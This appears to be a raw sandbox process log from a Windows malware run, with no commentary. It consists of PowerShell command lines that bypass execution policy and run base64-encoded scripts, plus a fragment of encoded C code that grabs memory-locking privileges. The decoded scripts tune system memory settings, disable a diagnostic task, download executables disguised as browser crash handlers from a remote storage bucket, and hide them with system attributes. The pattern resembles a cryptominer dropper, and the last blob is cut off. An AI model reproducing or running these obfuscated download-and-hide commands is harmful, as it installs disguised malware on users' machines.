GMAdAB1AHIAZQAKACAAIAAgACAAaQBmACAAKAAhAEcAZQB0AFQAbwBrAGUAbgBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AKABoAFQAbwBrAGUAbgAsACAAVABvAGsAZQBuAFUAcwBlAHIALAAgAE4AVQBMAEwALAAgADAALAAgACYAZAB3AEIAdQBmAGYAZQByAFMAaQB6AGUAKQAgACYAJgAKACAAIAAgACAAIAAgACAAIAAoAEcAZQB0AEwAYQBzAHQARQByAHIAbwByACgAKQAgACEAPQAgAEUAUgBSAE8AUgBfAEkATgBTAFUARgBGAEkAQwBJAEUATgBUAF8AQgBVAEYARgBFAFIAKQApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAGEAcABwAGwAbwBnACgATABPAEcAXwBJAE4ARgBPACwAIAAiAEcAZQB0AFQAbwBrAGUAbgBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AIABmAGEAaQBsAGUAZAAuACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAIAByAGUAdAB1AHIAbgBlAGQAOgAgACUAZABcAG4AIgAsACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAKAApACkAOwAKAAoAIAAgACAAIAAgACAAIAAgAC8ALwAgAEMAbABlAGEAbgB1AHAACgAgACAAIAAgACAAIAAgACAAQwBsAG8AcwBlAEgAYQBuAGQAbABlACgAaABUAG8AawBlAG4AKQA7AAoAIAAgACAAIAAgACAAIAAgAGgAVABvAGsAZQBuACAAPQAgAE4AVQBMAEwAOwAKAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAALQAxADsACgAgACAAIAAgAH0ACgAKACAAIAAgACAAUABUAE8ASwBFAE4AXwBVAFMARQBSACAAcABUAG8AawBlAG4AVQBzAGUAcgAgAD0AIAAoAFAAVABPAEsARQBOAF8AVQBTAEUAUgApACAAbQBhAGwAbABvAGMAKABkAHcAQgB1AGYAZgBlAHIAUwBpAHoAZQApADsACgAKACAAIAAgACAALwAvACAAUgBlAHQAcgBpAGUAdgBlACAAdABoAGUAIAB0AG8AawBlAG4AIABpAG4AZgBvAHIAbQBhAHQAaQBvAG4AIABpAG4AIABhACAAVABPAEsARQBOAF8AVQBTAEUAUgAgAHMAdAByAHUAYwB0AHUAcgBlAAoAIAAgACAAIABpAGYAIAAoACEARwBlAHQAVABvAGsAZQBuAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAoAAoAIAAgACAAIAAgACAAIAAgAGgAVABvAGsAZQBuACwACgAgACAAIAAgACAAIAAgACAAVABvAGsAZQBuAFUAcwBlAHIALAAKACAAIAAgACAAIAAgACAAIABwAFQAbwBrAGUAbgBVAHMAZQByACwACgAgACAAIAAgACAAIAAgACAAZAB3AEIAdQBmAGYAZQByAFMAaQB6AGUALAAKACAAIAAgACAAIAAgACAAIAAmAGQAdwBCAHUAZgBmAGUAcgBTAGkAegBlACkAKQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIABhAHAAcABsAG8AZwAoAEwATwBHAF8ASQBOAEYATwAsACAAIgBHAGUAdABUAG8AawBlAG4ASQBuAGYAbwByAG0AYQB0AGkAbwBuACAAZgBhAGkAbABlAGQALgAgAEcAZQB0AEwAYQBzAHQARQByAHIAbwByACAAcgBlAHQAdQByAG4AZQBkADoAIAAlAGQAXABuACIALAAgAEcAZQB0AEwAYQBzAHQARQByAHIAbwByACgAKQApADsACgAKACAAIAAgACAAIAAgACAAIAAvAC8AIABDAGwAZQBhAG4AdQBwAAoAIAAgACAAIAAgACAAIAAgAEMAbABvAHMAZQBIAGEAbgBkAGwAZQAoAGgAVABvAGsAZQBuACkAOwAKACAAIAAgACAAIAAgACAAIABoAFQAbwBrAGUAbgAgAD0AIABOAFUATABMADsACgAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgAC0AMQA7AAoAIAAgACAAIAB9AAoACgAgACAAIAAgAC8ALwAgAFAAcgBpAG4AdAAgAFMASQBEACAAcwB0AHIAaQBuAGcACgAgACAAIAAgAEwAUABXAFMAVABSACAAcwB0AHIAcwBpAGQAOwAKACAAIAAgACAAQwBvAG4AdgBlAHIAdABTAGkAZABUAG8AUwB0AHIAaQBuAGcAUwBpAGQAKABwAFQAbwBrAGUAbgBVAHMAZQByAC0APgBVAHMAZQByAC4AUwBpAGQALAAgACYAcwB0AHIAcwBpAGQAKQA7AAoAIAAgACAAIABhAHAAcABsAG8AZwAoAEwATwBHAF8ASQBOAEYATwAsACAAIgBVAHMAZQByACAAUwBJAEQAOgAgACUAUwBcAG4AIgAsACAAcwB0AHIAcwBpAGQAKQA7AAoACgAgACAAIAAgAC8ALwAgAEMAbABlAGEAbgB1AHAACgAgACAAIAAgAEMAbABvAHMAZQBIAGEAbgBkAGwAZQAoAGgAVABvAGsAZQBuACkAOwAKACAAIAAgACAAaABUAG8AawBlAG4AIAA9ACAATgBVAEwATAA7AAoACgAgACAAIAAgAE4AVABTAFQAQQBUAFUAUwAgAHMAdABhAHQAdQBzADsACgAgACAAIAAgAEwAUwBBAF8ASABBAE4ARABMAEUAIABwAG8AbABpAGMAeQBIAGEAbgBkAGwAZQA7AAoACgAgACAAIAAgAGkAZgAgACgAcwB0AGEAdAB1AHMAIAA9ACAATwBwAGUAbgBQAG8AbABpAGMAeQAoAE4AVQBMAEwALAAgAFAATwBMAEkAQwBZAF8AQwBSAEUAQQBUAEUAXwBBAEMAQwBPAFUATgBUACAAfAAgAFAATwBMAEkAQwBZAF8ATABPAE8ASwBVAFAAXwBOAEEATQBFAFMALAAgACYAcABvAGwAaQBjAHkASABhAG4AZABsAGUAKQApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAGEAcABwAGwAbwBnACgATABPAEcAXwBJAE4ARgBPACwAIAAiAE8AcABlAG4AUABvAGwAaQBjAHkAIAAlAGQAIgAsACAAcwB0AGEAdAB1AHMAKQA7AAoAIAAgACAAIAB9AAoACgAgACAAIAAgAC8ALwAgAEEAZABkACAAbgBlAHcAIABwAHIAaQB2AGUAbABlAGcAZQAgAHQAbwAgAHQAaABlACAAYQBjAGMAbwB1AG4AdAAKACAAIAAgACAAaQBmACAAKABzAHQAYQB0AHUAcwAgAD0AIABTAGUAdABQAHIAaQB2AGkAbABlAGcAZQBPAG4AQQBjAGMAbwB1AG4AdAAoAHAAbwBsAGkAYwB5AEgAYQBuAGQAbABlACwAIABwAFQAbwBrAGUAbgBVAHMAZQByAC0APgBVAHMAZQByAC4AUwBpAGQALAAgAFMARQBfAEwATwBDAEsAXwBNAEUATQBPAFIAWQBfAE4AQQBNAEUALAAgAFQAUgBVAEUAKQApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAGEAcABwAGwAbwBnACgATABPAEcAXwBJAE4ARgBPACwAIAAiAE8AcABlAG4AUABTAGUAdABQAHIAaQB2AGkAbABlAGcAZQBPAG4AQQBjAGMAbwB1AG4AdABvAGwAaQBjAHkAIAAlAGQAIgAsACAAcwB0AGEAdAB1AHMAKQA7AAoAIAAgACAAIAB9AAoACgAgACAAIAAgAC8ALwAgAEUAbgBhAGIAbABlACAAdABoAGkAcwAgAHAAcgBpAHYAZQBsAGUAZABnAGUAIABmAG8AcgAgAHQAaABlACAAYwB1AHIAcgBlAG4AdAAgAHAAcgBvAGMAZQBzAHMACgAgACAAIAAgAGgAVABvAGsAZQBuACAAPQAgAE4AVQBMAEwAOwAKACAAIAAgACAAVABPAEsARQBOAF8AUABSAEkAVgBJAEwARQBHAEUAUwAgAHQAcAA7AAoACgAgACAAIAAgAGkAZgAgACgAIQBPAHAAZQBuAFAAcgBvAGMAZQBzAHMAVABvAGsAZQBuACgARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAsACAAVABPAEsARQBOAF8AUQBVAEUAUgBZACAAfAAgAFQATwBLAEUATgBfAEEARABKAFUAUwBUAF8AUABSAEkAVgBJAEwARQBHAEUAUwAsACAAJgBoAFQAbwBrAGUAbgApACkACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAYQBwAHAAbABvAGcAKABMAE8ARwBfAEkATgBGAE8ALAAgACIATwBwAGUAbgBQAHIAbwBjAGUAcwBzAFQAbwBrAGUAbgAgACMAMgAgAGYAYQBpAGwAZQBkAC4AIABHAGUAdABMAGEAcwB0AEUAcgByAG8AcgAgAHIAZQB0AHUAcgBuAGUAZAA6ACAAJQBkAFwAbgAiACwAIABHAGUAdABMAGEAcwB0AEUAcgByAG8AcgAoACkAKQA7AAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAALQAxADsACgAgACAAIAAgAH0ACgAKACAAIAAgACAAdABwAC4AUAByAGkAdgBpAGwAZQBnAGUAQwBvAHUAbgB0ACAAPQAgADEAOwAKACAAIAAgACAAdABwAC4AUAByAGkAdgBpAGwAZQBnAGUAcwBbADAAXQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAUwBFAF8AUABSAEkAVgBJAEwARQBHAEUAXwBFAE4AQQBCAEwARQBEADsACgAKACAAIAAgACAAaQBmACAAKAAhAEwAbwBvAGsAdQBwAFAAcgBpAHYAaQBsAGUAZwBlAFYAYQBsAHUAZQAoAE4AVQBMAEwALAAgAFMARQBfAEwATwBDAEsAXwBNAEUATQBPAFIAWQBfAE4AQQBNAEUALAAgACYAdABwAC4AUAByAGkAdgBpAGwAZQBnAGUAcwBbADAAXQAuAEwAdQBpAGQAKQApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAGEAcABwAGwAbwBnACgATABPAEcAXwBJAE4ARgBPACwAIAAiAEwAbwBvAGsAdQBwAFAAcgBpAHYAaQBsAGUAZwBlAFYAYQBsAHUAZQAgAGYAYQBpAGwAZQBkAC4AIABHAGUAdABMAGEAcwB0AEUAcgByAG8AcgAgAHIAZQB0AHUAcgBuAGUAZAA6ACAAJQBkAFwAbgAiACwAIABHAGUAdABMAGEAcwB0AEUAcgByAG8AcgAoACkAKQA7AAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAALQAxADsACgAgACAAIAAgAH0ACgAKACAAIAAgACAAQgBPAE8ATAAgAHIAZQBzAHUAbAB0ACAAPQAgAEEAZABqAHUAcwB0AFQAbwBrAGUAbgBQAHIAaQB2AGkAbABlAGcAZQBzACgAaABUAG8AawBlAG4ALAAgAEYAQQBMAFMARQAsACAAJgB0AHAALAAgADAALAAgACgAUABUAE8ASwBFAE4AXwBQAFIASQBWAEkATABFAEcARQBTACkATgBVAEwATAAsACAAMAApADsACgAgACAAIAAgAEQAVwBPAFIARAAgAGUAcgByAG8AcgAgAD0AIABHAGUAdABMAGEAcwB0AEUAcgByAG8AcgAoACkAOwAKAAoAIAAgACAAIABpAGYAIAAoACEAcgBlAHMAdQBsAHQAIAB8AHwAIAAoAGUAcgByAG8AcgAgACEAPQAgAEUAUgBSAE8AUgBfAFMAVQBDAEMARQBTAFMAKQApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAGEAcABwAGwAbwBnACgATABPAEcAXwBJAE4ARgBPACwAIAAiAEEAZABqAHUAcwB0AFQAbwBrAGUAbgBQAHIAaQB2AGkAbABlAGcAZQBzACAAZgBhAGkAbABlAGQALgAgAEcAZQB0AEwAYQBzAHQARQByAHIAbwByACAAcgBlAHQAdQByAG4AZQBkADoAIAAlAGQAXABuACIALAAgAGUAcgByAG8AcgApADsACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAtADEAOwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAvAC8AIABDAGwAZQBhAG4AdQBwAAoAIAAgACAAIABDAGwAbwBzAGUASABhAG4AZABsAGUAKABoAFQAbwBrAGUAbgApADsACgAgACAAIAAgAGgAVABvAGsAZQBuACAAPQAgAE4AVQBMAEwAOwAKAAoAIAAgACAAIABTAEkAWgBFAF8AVAAgAHAAYQBnAGUAUwBpAHoAZQAgAD0AIABHAGUAdABMAGEAcgBnAGUAUABhAGcAZQBNAGkAbgBpAG0AdQBtACgAKQA7AAoACgAgACAAIAAgAC8ALwAgAEYAaQBuAGEAbABsAHkAIABhAGwAbABvAGMAYQB0AGUAIAB0AGgAZQAgAG0AZQBtAG8AcgB5AAoAIAAgACAAIABjAGgAYQByACAAKgBsAGEAcgBnAGUAQgB1AGYAZgBlAHIAIAA9ACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABOAFUATABMACwAIABwAGEAZwBlAFMAaQB6AGUAIAAqACAATgBfAFAAQQBHAEUAUwBfAFQATwBfAEEATABMAE8AQwAsACAATQBFAE0AXwBSAEUAUwBFAFIAVgBFACAAfAAgAE0ARQBNAF8AQwBPAE0ATQBJAFQAIAB8ACAATQBFAE0AXwBMAEEAUgBHAEUAXwBQAEEARwBFAFMALAAgAFAAQQBHAEUAXwBSAEUAQQBEAFcAUgBJAFQARQApADsACgAgACAAIAAgAGkAZgAgACgAbABhAHIAZwBlAEIAdQBmAGYAZQByACkACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAYQBwAHAAbABvAGcAKABMAE8ARwBfAEkATgBGAE8ALAAgACIAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAIABmAGEAaQBsAGUAZAAsACAAZQByAHIAbwByACAAMAB4ACUAeAAiACwAIABHAGUAdABMAGEAcwB0AEUAcgByAG8AcgAoACkAKQA7AAoAIAAgACAAIAB9AAoAfQA=
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss577F.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi577C.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr577D.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr577E.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc JABwAGEAZwBlAGYAaQBsAGUAIAA9ACAARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAEMAbwBtAHAAdQB0AGUAcgBTAHkAcwB0AGUAbQAgAC0ARQBuAGEAYgBsAGUAQQBsAGwAUAByAGkAdgBpAGwAZQBnAGUAcwAKACQAcABhAGcAZQBmAGkAbABlAC4AQQB1AHQAbwBtAGEAdABpAGMATQBhAG4AYQBnAGUAZABQAGEAZwBlAGYAaQBsAGUAIAA9ACAAJABmAGEAbABzAGUACgAkAHAAYQBnAGUAZgBpAGwAZQAuAHAAdQB0ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwACgAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0ACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBwAGEAZwBlAGYAaQBsAGUAcwBlAHQAdABpAG4AZwAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0AC4ASQBuAGkAdABpAGEAbABTAGkAegBlACAAPQAgADQAMAAwADAACgAkAHAAYQBnAGUAZgBpAGwAZQBzAGUAdAAuAE0AYQB4AGkAbQB1AG0AUwBpAHoAZQAgAD0AIAAyADAAMAAwADAACgAkAHAAYQBnAGUAZgBpAGwAZQBzAGUAdAAuAFAAdQB0ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss6BB8.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi6BA5.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr6BA6.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr6BA7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc TgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXAAiACAALQBOAGEAbQBlACAAIgBHAHIAYQBwAGgAaQBjAHMARAByAGkAdgBlAHIAcwAiACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABHAHIAYQBwAGgAaQBjAHMARAByAGkAdgBlAHIAcwAiACAALQBOAGEAbQBlACAASAB3AFMAYwBoAE0AbwBkAGUAIAAtAFYAYQBsAHUAZQAgADIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABHAHIAYQBwAGgAaQBjAHMARAByAGkAdgBlAHIAcwAiACAALQBOAGEAbQBlACAAIgBIAHcAUwBjAGgATQBvAGQAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMgAgAC0ARgBvAHIAYwBlAAoACgBEAGkAcwBhAGIAbABlAC0ATQBNAEEAZwBlAG4AdAAgAC0AbQBjAAoARwBlAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAFAAYQB0AGgAIAAiAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwATQBlAG0AbwByAHkARABpAGEAZwBuAG8AcwB0AGkAYwBcACIAIAB8ACAARABpAHMAYQBiAGwAZQAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsACgA=
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss7F64.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi7F51.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr7F52.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr7F53.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAnAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAJwAKAAoAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAC8AQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQB7AH0ACgBlAGwAcwBlACAAewAKAAkASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcABzADoALwAvAHMAMwAuAHUAcwAtAGUAYQBzAHQALQAxAC4AYQBtAGEAegBvAG4AYQB3AHMALgBjAG8AbQAvADkAMwAwADcAZQBiAGMANQAvAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEALwBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAKAH0ACgAKACQAZgBpAGwAZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEALwBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAKACQAZgBpAGwAZQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEALwBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACAALQBQAGEAdABoAFQAeQBwAGUAIABMAGUAYQBmACkAewB9AAoAZQBsAHMAZQAgAHsACgAJAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAcwA6AC8ALwBzADMALgB1AHMALQBlAGEAcwB0AC0AMQAuAGEAbQBhAHoAbwBuAGEAdwBzAC4AYwBvAG0ALwA5ADMAMAA3AGUAYgBjADUALwBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEALwBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlAAoAfQAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAvAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKACQAZgBpAGwAZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAJABlAG4AdgA6AFQARQBNAFAALwBkAEkAbABoAG8AcwB0AC4AZQB4AGUACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAC8ARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQB7AH0ACgBlAGwAcwBlACAAewAKAAkASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcABzADoALwAvAHMAMwAuAHUAcwAtAGUAYQBzAHQALQAxAC4AYQBtAGEAegBvAG4AYQB3AHMALgBjAG8AbQAvADkAMwAwADcAZQBiAGMANQAvAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEALwBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAKAH0ACgAKACQAZgBpAGwAZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEALwBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAKACQAZgBpAGwAZQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUAAvAGQAbABJAGgAbwBzAHQALgBlAHgAZQAKACQAZgBpAGwAZQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEALwBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQB7AH0ACgBlAGwAcwBlACAAewAKAAkASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcABzADoALwAvAHMAMwAuAHUAcwAtAGUAYQBzAHQALQAxAC4AYQBtAGEAegBvAG4AYQB3AHMALgBjAG8AbQAvADkAMwAwADcAZQBiAGMANQAvAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAgAC0ATwB1AHQARgBpAGwAZQAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAC8AQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlAAoAfQAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAvAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAKACQAZgBpAGwAZQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUAAvAFIAdQBuAHQAaQBtAGUAQgByAG8AbwBrAGUAcgAuAGUAeABlAAoAJABmAGkAbABlAC4AQQB0AHQAcgBpAGIAdQB0AGUAcwAgAD0AIAAnAEgAaQBkAGQAZQBuACcALAAnAFMAeQBzAHQAZQBtACcACgAKAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAvAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgBBAHIAbQA2ADQALgBlAHgAZQAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApAHsAfQAKAGUAbABzAGUAIAB7AAoACQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIABoAHQAdABwAHMAOgAvAC8AcwAzAC4AdQBzAC0AZQBhAHMAdAAtADEALgBhAG0AYQB6AG8AbgBhAHcAcwAuAGMAbwBtAC8AOQAzADAANwBlAGIAYwA1AC8AQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAEEAcgBtADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEALwBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAQQByAG0ANgA0AC4AZQB4AGUACgB9AAoACgAkAGYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAC8AQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAEEAcgBtADYANAAuAGUAeABlAAoAJABmAGkAbABlAC4AQQB0AHQAcgBpAGIAdQB0AGUAcwAgAD0AIAAnAEgAaQBkAGQAZQBuACcALAAnAFMAeQBzAHQAZQBtACcACgAkAGYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAC8AdAByAGEAZgBmAG0AbwBuAGUAdABpAHoAZQByAC8AYQBwAHAALwBUAGUAeAB0AGwAbgBwAHUAdABIAG8AcwB0AC4AZQB4AGUACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUALwBFAG0AYgBtAGEAawBlAC4AZQB4AGUAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQB7AH0ACgBlAGwAcwBlACAAewAKAAkASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcABzADoALwAvAHMAMwAuAHUAcwAtAGUAYQBzAHQALQAxAC4AYQBtAGEAegBvAG4AYQB3AHMALgBjAG8AbQAvADkAMwAwADcAZQBiAGMANQAvAEUAbQBiAG0AYQBrAGUALgBlAHgAZQAgAC0ATwB1AHQARgBpAGwAZQAgACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUALwBFAG0AYgB